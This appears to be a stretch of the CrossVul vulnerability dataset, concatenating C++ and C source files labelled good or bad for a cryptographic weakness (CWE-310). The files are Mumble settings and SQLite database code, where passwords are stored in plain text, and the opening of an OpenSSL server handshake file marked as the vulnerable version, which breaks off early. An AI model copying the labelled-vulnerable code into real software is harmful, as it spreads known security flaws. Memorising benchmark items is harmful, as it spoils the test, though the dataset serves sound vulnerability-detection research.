SAVELOAD(qbaMinimalViewGeometry, "ui/minimalviewgeometry");
SAVELOAD(qbaMinimalViewState, "ui/minimalviewstate");
SAVELOAD(qbaConfigGeometry, "ui/ConfigGeometry");
SAVELOAD(wlWindowLayout, "ui/WindowLayout");
SAVELOAD(qbaSplitterState, "ui/splitter");
SAVELOAD(qbaHeaderState, "ui/header");
SAVELOAD(qsUsername, "ui/username");
SAVELOAD(qsLastServer, "ui/server");
SAVELOAD(ssFilter, "ui/serverfilter");
SAVELOAD(bUpdateCheck, "ui/updatecheck");
SAVELOAD(bPluginOverlayCheck, "ui/plugincheck");
SAVELOAD(bHideInTray, "ui/hidetray");
SAVELOAD(bStateInTray, "ui/stateintray");
SAVELOAD(bUsage, "ui/usage");
SAVELOAD(bShowUserCount, "ui/showusercount");
SAVELOAD(qsImagePath, "ui/imagepath");
SAVELOAD(bShowContextMenuInMenuBar, "ui/showcontextmenuinmenubar");
SAVELOAD(qbaConnectDialogGeometry, "ui/connect/geometry");
SAVELOAD(qbaConnectDialogHeader, "ui/connect/header");
SAVELOAD(bHighContrast, "ui/HighContrast");
SAVELOAD(iMaxLogBlocks, "ui/MaxLogBlocks");
// PTT Button window
SAVELOAD(bShowPTTButtonWindow, "ui/showpttbuttonwindow");
SAVELOAD(qbaPTTButtonWindowGeometry, "ui/pttbuttonwindowgeometry");
// Recording
SAVELOAD(qsRecordingPath, "recording/path");
SAVELOAD(qsRecordingFile, "recording/file");
SAVELOAD(rmRecordingMode, "recording/mode");
SAVELOAD(iRecordingFormat, "recording/format");
// LCD
SAVELOAD(iLCDUserViewMinColWidth, "lcd/userview/mincolwidth");
SAVELOAD(iLCDUserViewSplitterWidth, "lcd/userview/splitterwidth");
QByteArray qba = CertWizard::exportCert(kpCertificate);
settings_ptr->setValue(QLatin1String("net/certificate"), qba);
settings_ptr->beginWriteArray(QLatin1String("shortcuts"));
int idx = 0;
foreach(const Shortcut &s, qlShortcuts) {
if (! s.isServerSpecific()) {
settings_ptr->setArrayIndex(idx++);
settings_ptr->setValue(QLatin1String("index"), s.iIndex);
settings_ptr->setValue(QLatin1String("keys"), s.qlButtons);
settings_ptr->setValue(QLatin1String("suppress"), s.bSuppress);
settings_ptr->setValue(QLatin1String("data"), s.qvData);
}
}
settings_ptr->endArray();
settings_ptr->beginWriteArray(QLatin1String("messages"));
for (QMap<int, quint32>::const_iterator it = qmMessages.constBegin(); it != qmMessages.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessages[it.key()], "log");
}
settings_ptr->endArray();
settings_ptr->beginWriteArray(QLatin1String("messagesounds"));
for (QMap<int, QString>::const_iterator it = qmMessageSounds.constBegin(); it != qmMessageSounds.constEnd(); ++it) {
settings_ptr->setArrayIndex(it.key());
SAVELOAD(qmMessageSounds[it.key()], "logsound");
}
settings_ptr->endArray();
settings_ptr->beginGroup(QLatin1String("lcd/devices"));
foreach(const QString &d, qmLCDDevices.keys()) {
bool v = qmLCDDevices.value(d);
if (!v)
settings_ptr->setValue(d, v);
else
settings_ptr->remove(d);
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("audio/plugins"));
foreach(const QString &d, qmPositionalAudioPlugins.keys()) {
bool v = qmPositionalAudioPlugins.value(d);
if (!v)
settings_ptr->setValue(d, v);
else
settings_ptr->remove(d);
}
settings_ptr->endGroup();
settings_ptr->beginGroup(QLatin1String("overlay"));
os.save(settings_ptr);
settings_ptr->endGroup();
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/good_3579_1 |
crossvul-cpp_data_good_3579_0 | /* Copyright (C) 2005-2011, Thorvald Natvig <thorvald@natvig.com>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the Mumble Developers nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "Database.h"
#include "Global.h"
#include "Message.h"
#include "Net.h"
#include "Version.h"
Database::Database() {
QSqlDatabase db = QSqlDatabase::addDatabase(QLatin1String("QSQLITE"));
QSettings qs;
QStringList datapaths;
int i;
datapaths << g.qdBasePath.absolutePath();
datapaths << QDesktopServices::storageLocation(QDesktopServices::DataLocation);
#if defined(Q_OS_UNIX) && ! defined(Q_OS_MAC)
datapaths << QDir::homePath() + QLatin1String("/.config/Mumble");
#endif
datapaths << QDir::homePath();
datapaths << QDir::currentPath();
datapaths << qApp->applicationDirPath();
datapaths << qs.value(QLatin1String("InstPath")).toString();
bool found = false;
for (i = 0; (i < datapaths.size()) && ! found; i++) {
if (!datapaths[i].isEmpty()) {
QFile f(datapaths[i] + QLatin1String("/mumble.sqlite"));
if (f.exists()) {
db.setDatabaseName(f.fileName());
found = db.open();
}
QFile f2(datapaths[i] + QLatin1String("/.mumble.sqlite"));
if (f2.exists()) {
db.setDatabaseName(f2.fileName());
found = db.open();
}
}
}
if (! found) {
for (i = 0; (i < datapaths.size()) && ! found; i++) {
if (!datapaths[i].isEmpty()) {
QDir::root().mkpath(datapaths[i]);
#ifdef Q_OS_WIN
QFile f(datapaths[i] + QLatin1String("/mumble.sqlite"));
#else
QFile f(datapaths[i] + QLatin1String("/.mumble.sqlite"));
#endif
db.setDatabaseName(f.fileName());
found = db.open();
}
}
}
if (! found) {
QMessageBox::critical(NULL, QLatin1String("Mumble"), tr("Mumble failed to initialize a database in any\nof the possible locations."), QMessageBox::Ok | QMessageBox::Default, QMessageBox::NoButton);
qFatal("Database: Failed initialization");
}
QFileInfo fi(db.databaseName());
if (! fi.isWritable()) {
QMessageBox::critical(NULL, QLatin1String("Mumble"), tr("The database '%1' is read-only. Mumble cannot store server settings (i.e. SSL certificates) until you fix this problem.").arg(fi.filePath()), QMessageBox::Ok | QMessageBox::Default, QMessageBox::NoButton);
qWarning("Database: Database is read-only");
}
{
QFile f(db.databaseName());
f.setPermissions(f.permissions() & ~(QFile::ReadGroup | QFile::WriteGroup | QFile::ExeGroup | QFile::ReadOther | QFile::WriteOther | QFile::ExeOther));
}
QSqlQuery query;
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `servers` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT, `hostname` TEXT, `port` INTEGER DEFAULT " MUMTEXT(DEFAULT_MUMBLE_PORT) ", `username` TEXT, `password` TEXT)"));
query.exec(QLatin1String("ALTER TABLE `servers` ADD COLUMN `url` TEXT"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `comments` (`who` TEXT, `comment` BLOB, `seen` DATE)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `comments_comment` ON `comments`(`who`, `comment`)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `comments_seen` ON `comments`(`seen`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `blobs` (`hash` TEXT, `data` BLOB, `seen` DATE)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `blobs_hash` ON `blobs`(`hash`)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `blobs_seen` ON `blobs`(`seen`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `tokens` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB, `token` TEXT)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `tokens_host_port` ON `tokens`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `shortcut` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB, `shortcut` BLOB, `target` BLOB, `suppress` INTEGER)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `shortcut_host_port` ON `shortcut`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `udp` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `udp_host_port` ON `udp`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `cert` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hostname` TEXT, `port` INTEGER, `digest` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `cert_host_port` ON `cert`(`hostname`,`port`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `friends` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT, `hash` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `friends_name` ON `friends`(`name`)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `friends_hash` ON `friends`(`hash`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `muted` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hash` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `muted_hash` ON `muted`(`hash`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `pingcache` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hostname` TEXT, `port` INTEGER, `ping` INTEGER)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `pingcache_host_port` ON `pingcache`(`hostname`,`port`)"));
query.exec(QLatin1String("DELETE FROM `comments` WHERE `seen` < datetime('now', '-1 years')"));
query.exec(QLatin1String("DELETE FROM `blobs` WHERE `seen` < datetime('now', '-1 months')"));
query.exec(QLatin1String("VACUUM"));
query.exec(QLatin1String("PRAGMA synchronous = OFF"));
query.exec(QLatin1String("PRAGMA journal_mode = TRUNCATE"));
query.exec(QLatin1String("SELECT sqlite_version()"));
while (query.next())
qWarning() << "Database SQLite:" << query.value(0).toString();
}
Database::~Database() {
QSqlQuery query;
query.exec(QLatin1String("PRAGMA journal_mode = DELETE"));
query.exec(QLatin1String("VACUUM"));
}
QList<FavoriteServer> Database::getFavorites() {
QSqlQuery query;
QList<FavoriteServer> ql;
query.prepare(QLatin1String("SELECT `name`, `hostname`, `port`, `username`, `password`, `url` FROM `servers` ORDER BY `name`"));
query.exec();
while (query.next()) {
FavoriteServer fs;
fs.qsName = query.value(0).toString();
fs.qsHostname = query.value(1).toString();
fs.usPort = static_cast<unsigned short>(query.value(2).toUInt());
fs.qsUsername = query.value(3).toString();
fs.qsPassword = query.value(4).toString();
fs.qsUrl = query.value(5).toString();
ql << fs;
}
return ql;
}
void Database::setFavorites(const QList<FavoriteServer> &servers) {
QSqlQuery query;
QSqlDatabase::database().transaction();
query.prepare(QLatin1String("DELETE FROM `servers`"));
query.exec();
query.prepare(QLatin1String("REPLACE INTO `servers` (`name`, `hostname`, `port`, `username`, `password`, `url`) VALUES (?,?,?,?,?,?)"));
foreach(const FavoriteServer &s, servers) {
query.addBindValue(s.qsName);
query.addBindValue(s.qsHostname);
query.addBindValue(s.usPort);
query.addBindValue(s.qsUsername);
query.addBindValue(s.qsPassword);
query.addBindValue(s.qsUrl);
query.exec();
}
QSqlDatabase::database().commit();
}
bool Database::isLocalMuted(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `hash` FROM `muted` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
while (query.next()) {
return true;
}
return false;
}
void Database::setLocalMuted(const QString &hash, bool muted) {
QSqlQuery query;
if (muted)
query.prepare(QLatin1String("INSERT INTO `muted` (`hash`) VALUES (?)"));
else
query.prepare(QLatin1String("DELETE FROM `muted` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
}
QMap<QPair<QString, unsigned short>, unsigned int> Database::getPingCache() {
QSqlQuery query;
QMap<QPair<QString, unsigned short>, unsigned int> map;
query.prepare(QLatin1String("SELECT `hostname`, `port`, `ping` FROM `pingcache`"));
query.exec();
while (query.next()) {
map.insert(QPair<QString, unsigned short>(query.value(0).toString(), query.value(1).toUInt()), query.value(2).toUInt());
}
return map;
}
void Database::setPingCache(const QMap<QPair<QString, unsigned short>, unsigned int> &map) {
QSqlQuery query;
QMap<QPair<QString, unsigned short>, unsigned int>::const_iterator i;
QSqlDatabase::database().transaction();
query.prepare(QLatin1String("DELETE FROM `pingcache`"));
query.exec();
query.prepare(QLatin1String("REPLACE INTO `pingcache` (`hostname`, `port`, `ping`) VALUES (?,?,?)"));
for (i = map.constBegin(); i != map.constEnd(); ++i) {
query.addBindValue(i.key().first);
query.addBindValue(i.key().second);
query.addBindValue(i.value());
query.exec();
}
QSqlDatabase::database().commit();
}
bool Database::seenComment(const QString &hash, const QByteArray &commenthash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT COUNT(*) FROM `comments` WHERE `who` = ? AND `comment` = ?"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
if (query.next()) {
if (query.value(0).toInt() > 0) {
query.prepare(QLatin1String("UPDATE `comments` SET `seen` = datetime('now') WHERE `who` = ? AND `comment` = ?"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
return true;
}
}
return false;
}
void Database::setSeenComment(const QString &hash, const QByteArray &commenthash) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `comments` (`who`, `comment`, `seen`) VALUES (?, ?, datetime('now'))"));
query.addBindValue(hash);
query.addBindValue(commenthash);
query.exec();
}
QByteArray Database::blob(const QByteArray &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `data` FROM `blobs` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
if (query.next()) {
QByteArray qba = query.value(0).toByteArray();
query.prepare(QLatin1String("UPDATE `blobs` SET `seen` = datetime('now') WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
return qba;
}
return QByteArray();
}
void Database::setBlob(const QByteArray &hash, const QByteArray &data) {
if (hash.isEmpty() || data.isEmpty())
return;
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `blobs` (`hash`, `data`, `seen`) VALUES (?, ?, datetime('now'))"));
query.addBindValue(hash);
query.addBindValue(data);
query.exec();
}
QStringList Database::getTokens(const QByteArray &digest) {
QList<QString> qsl;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `token` FROM `tokens` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
while (query.next()) {
qsl << query.value(0).toString();
}
return qsl;
}
void Database::setTokens(const QByteArray &digest, QStringList &tokens) {
QSqlQuery query;
query.prepare(QLatin1String("DELETE FROM `tokens` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
query.prepare(QLatin1String("INSERT INTO `tokens` (`digest`, `token`) VALUES (?,?)"));
foreach(const QString &qs, tokens) {
query.addBindValue(digest);
query.addBindValue(qs);
query.exec();
}
}
QList<Shortcut> Database::getShortcuts(const QByteArray &digest) {
QList<Shortcut> ql;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `shortcut`,`target`,`suppress` FROM `shortcut` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
while (query.next()) {
Shortcut sc;
QByteArray a = query.value(0).toByteArray();
{
QDataStream s(&a, QIODevice::ReadOnly);
s.setVersion(QDataStream::Qt_4_0);
s >> sc.qlButtons;
}
a = query.value(1).toByteArray();
{
QDataStream s(&a, QIODevice::ReadOnly);
s.setVersion(QDataStream::Qt_4_0);
s >> sc.qvData;
}
sc.bSuppress=query.value(2).toBool();
ql << sc;
}
return ql;
}
bool Database::setShortcuts(const QByteArray &digest, QList<Shortcut> &shortcuts) {
QSqlQuery query;
bool updated = false;
query.prepare(QLatin1String("DELETE FROM `shortcut` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
const QList<Shortcut> scs = shortcuts;
query.prepare(QLatin1String("INSERT INTO `shortcut` (`digest`, `shortcut`, `target`, `suppress`) VALUES (?,?,?,?)"));
foreach(const Shortcut &sc, scs) {
if (sc.isServerSpecific()) {
shortcuts.removeAll(sc);
updated = true;
query.addBindValue(digest);
QByteArray a;
{
QDataStream s(&a, QIODevice::WriteOnly);
s.setVersion(QDataStream::Qt_4_0);
s << sc.qlButtons;
}
query.addBindValue(a);
a.clear();
{
QDataStream s(&a, QIODevice::WriteOnly);
s.setVersion(QDataStream::Qt_4_0);
s << sc.qvData;
}
query.addBindValue(a);
query.addBindValue(sc.bSuppress);
query.exec();
}
}
return updated;
}
const QMap<QString, QString> Database::getFriends() {
QMap<QString, QString> qm;
QSqlQuery query;
query.prepare(QLatin1String("SELECT `name`, `hash` FROM `friends`"));
query.exec();
while (query.next())
qm.insert(query.value(0).toString(), query.value(1).toString());
return qm;
}
const QString Database::getFriend(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `name` FROM `friends` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
if (query.next())
return query.value(0).toString();
return QString();
}
void Database::addFriend(const QString &name, const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `friends` (`name`, `hash`) VALUES (?,?)"));
query.addBindValue(name);
query.addBindValue(hash);
query.exec();
}
void Database::removeFriend(const QString &hash) {
QSqlQuery query;
query.prepare(QLatin1String("DELETE FROM `friends` WHERE `hash` = ?"));
query.addBindValue(hash);
query.exec();
}
const QString Database::getDigest(const QString &hostname, unsigned short port) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT `digest` FROM `cert` WHERE `hostname` = ? AND `port` = ?"));
query.addBindValue(hostname);
query.addBindValue(port);
query.exec();
if (query.next()) {
return query.value(0).toString();
}
return QString();
}
void Database::setDigest(const QString &hostname, unsigned short port, const QString &digest) {
QSqlQuery query;
query.prepare(QLatin1String("REPLACE INTO `cert` (`hostname`,`port`,`digest`) VALUES (?,?,?)"));
query.addBindValue(hostname);
query.addBindValue(port);
query.addBindValue(digest);
query.exec();
}
void Database::setPassword(const QString &hostname, unsigned short port, const QString &uname, const QString &pw) {
QSqlQuery query;
query.prepare(QLatin1String("UPDATE `servers` SET `password` = ? WHERE `hostname` = ? AND `port` = ? AND `username` = ?"));
query.addBindValue(pw);
query.addBindValue(hostname);
query.addBindValue(port);
query.addBindValue(uname);
query.exec();
}
bool Database::getUdp(const QByteArray &digest) {
QSqlQuery query;
query.prepare(QLatin1String("SELECT COUNT(*) FROM `udp` WHERE `digest` = ? "));
query.addBindValue(digest);
query.exec();
if (query.next()) {
return (query.value(0).toInt() == 0);
}
return true;
}
void Database::setUdp(const QByteArray &digest, bool udp) {
QSqlQuery query;
if (! udp)
query.prepare(QLatin1String("REPLACE INTO `udp` (`digest`) VALUES (?)"));
else
query.prepare(QLatin1String("DELETE FROM `udp` WHERE `digest` = ?"));
query.addBindValue(digest);
query.exec();
}
bool Database::fuzzyMatch(QString &name, QString &user, QString &pw, QString &hostname, unsigned short port) {
QSqlQuery query;
if (! user.isEmpty()) {
query.prepare(QLatin1String("SELECT `username`, `password`, `hostname`, `name` FROM `servers` WHERE `username` LIKE ? AND `hostname` LIKE ? AND `port`=?"));
query.addBindValue(user);
} else {
query.prepare(QLatin1String("SELECT `username`, `password`, `hostname`, `name` FROM `servers` WHERE `hostname` LIKE ? AND `port`=?"));
}
query.addBindValue(hostname);
query.addBindValue(port);
query.exec();
if (query.next()) {
user = query.value(0).toString();
if (pw.isEmpty())
pw = query.value(1).toString();
hostname = query.value(2).toString();
if (name.isEmpty())
name = query.value(3).toString();
return true;
} else {
return false;
}
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/good_3579_0 |
crossvul-cpp_data_bad_1445_5 | /* ssl/s3_srvr.c -*- mode:C; c-file-style: "eay" -*- */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
/* ====================================================================
* Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* 3. All advertising materials mentioning features or use of this
* software must display the following acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
*
* 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
* endorse or promote products derived from this software without
* prior written permission. For written permission, please contact
* openssl-core@openssl.org.
*
* 5. Products derived from this software may not be called "OpenSSL"
* nor may "OpenSSL" appear in their names without prior written
* permission of the OpenSSL Project.
*
* 6. Redistributions of any form whatsoever must retain the following
* acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit (http://www.openssl.org/)"
*
* THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
* EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR
* ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
* ====================================================================
*
* This product includes cryptographic software written by Eric Young
* (eay@cryptsoft.com). This product includes software written by Tim
* Hudson (tjh@cryptsoft.com).
*
*/
/* ====================================================================
* Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
*
* Portions of the attached software ("Contribution") are developed by
* SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
*
* The Contribution is licensed pursuant to the OpenSSL open source
* license provided above.
*
* ECC cipher suite support in OpenSSL originally written by
* Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
*
*/
/* ====================================================================
* Copyright 2005 Nokia. All rights reserved.
*
* The portions of the attached software ("Contribution") is developed by
* Nokia Corporation and is licensed pursuant to the OpenSSL open source
* license.
*
* The Contribution, originally written by Mika Kousa and Pasi Eronen of
* Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
* support (see RFC 4279) to OpenSSL.
*
* No patent licenses or other rights except those expressly stated in
* the OpenSSL open source license shall be deemed granted or received
* expressly, by implication, estoppel, or otherwise.
*
* No assurances are provided by Nokia that the Contribution does not
* infringe the patent or other intellectual property rights of any third
* party or that the license provides you with all the necessary rights
* to make use of the Contribution.
*
* THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
* ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
* SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
* OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
* OTHERWISE.
*/
#define REUSE_CIPHER_BUG
#define NETSCAPE_HANG_BUG
#include <stdio.h>
#include "ssl_locl.h"
#include "kssl_lcl.h"
#include "../crypto/constant_time_locl.h"
#include <openssl/buffer.h>
#include <openssl/rand.h>
#include <openssl/objects.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <openssl/x509.h>
#ifndef OPENSSL_NO_DH
#include <openssl/dh.h>
#endif
#include <openssl/bn.h>
#ifndef OPENSSL_NO_KRB5
#include <openssl/krb5_asn.h>
#endif
#include <openssl/md5.h>
#ifndef OPENSSL_NO_SSL3_METHOD
static const SSL_METHOD *ssl3_get_server_method(int ver);
static const SSL_METHOD *ssl3_get_server_method(int ver)
{
if (ver == SSL3_VERSION)
return(SSLv3_server_method());
else
return(NULL);
}
IMPLEMENT_ssl3_meth_func(SSLv3_server_method,
ssl3_accept,
ssl_undefined_function,
ssl3_get_server_method)
#endif
#ifndef OPENSSL_NO_SRP
static int ssl_check_srp_ext_ClientHello(SSL *s, int *al)
{
int ret = SSL_ERROR_NONE;
*al = SSL_AD_UNRECOGNIZED_NAME;
if ((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP) &&
(s->srp_ctx.TLS_ext_srp_username_callback != NULL))
{
if(s->srp_ctx.login == NULL)
{
/* RFC 5054 says SHOULD reject,
we do so if There is no srp login name */
ret = SSL3_AL_FATAL;
*al = SSL_AD_UNKNOWN_PSK_IDENTITY;
}
else
{
ret = SSL_srp_server_param_with_username(s,al);
}
}
return ret;
}
#endif
int ssl3_accept(SSL *s)
{
BUF_MEM *buf;
unsigned long alg_k,Time=(unsigned long)time(NULL);
void (*cb)(const SSL *ssl,int type,int val)=NULL;
int ret= -1;
int new_state,state,skip=0;
RAND_add(&Time,sizeof(Time),0);
ERR_clear_error();
clear_sys_error();
if (s->info_callback != NULL)
cb=s->info_callback;
else if (s->ctx->info_callback != NULL)
cb=s->ctx->info_callback;
/* init things to blank */
s->in_handshake++;
if (!SSL_in_init(s) || SSL_in_before(s)) SSL_clear(s);
if (s->cert == NULL)
{
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_NO_CERTIFICATE_SET);
return(-1);
}
#ifndef OPENSSL_NO_HEARTBEATS
/* If we're awaiting a HeartbeatResponse, pretend we
* already got and don't await it anymore, because
* Heartbeats don't make sense during handshakes anyway.
*/
if (s->tlsext_hb_pending)
{
s->tlsext_hb_pending = 0;
s->tlsext_hb_seq++;
}
#endif
for (;;)
{
state=s->state;
switch (s->state)
{
case SSL_ST_RENEGOTIATE:
s->renegotiate=1;
/* s->state=SSL_ST_ACCEPT; */
case SSL_ST_BEFORE:
case SSL_ST_ACCEPT:
case SSL_ST_BEFORE|SSL_ST_ACCEPT:
case SSL_ST_OK|SSL_ST_ACCEPT:
s->server=1;
